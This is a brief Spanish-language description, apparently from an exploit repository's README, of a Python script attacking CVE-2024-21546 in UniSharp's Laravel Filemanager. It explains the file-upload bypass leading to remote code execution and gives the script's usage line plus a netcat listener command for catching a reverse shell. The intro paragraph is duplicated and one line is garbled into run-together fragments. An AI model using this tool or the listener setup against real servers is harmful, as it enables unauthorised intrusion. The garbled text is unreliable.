
Este script de exploit en Python apunta a un Laravel Filemanager vulnerable creado por UniSharp, que permite a usuarios autenticados eludir las restricciones de archivos y subir archivos maliciosos. Esto puede conducir a la Ejecución Remota de Código (RCE) cuando se activa el payload subido.
Este script de exploit en Python ataca a un Laravel Filemanager vulnerable creado por UniSharp, que permite a los usuarios autenticados eludir las restricciones de archivos y subir archivos maliciosos. Esto puede conducir a Ejecución Remota de Código (RCE) cuando se activa la carga útil subida.
El exploit realiza lo siguiente:
laravel_session proporcionado por el usuario_token de CSRF mediante regexVersión 2.9.1 y anteriores
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
Importante: Inicia tu listener antes de ejecutar el script:
nc -lvnp <listener_port>
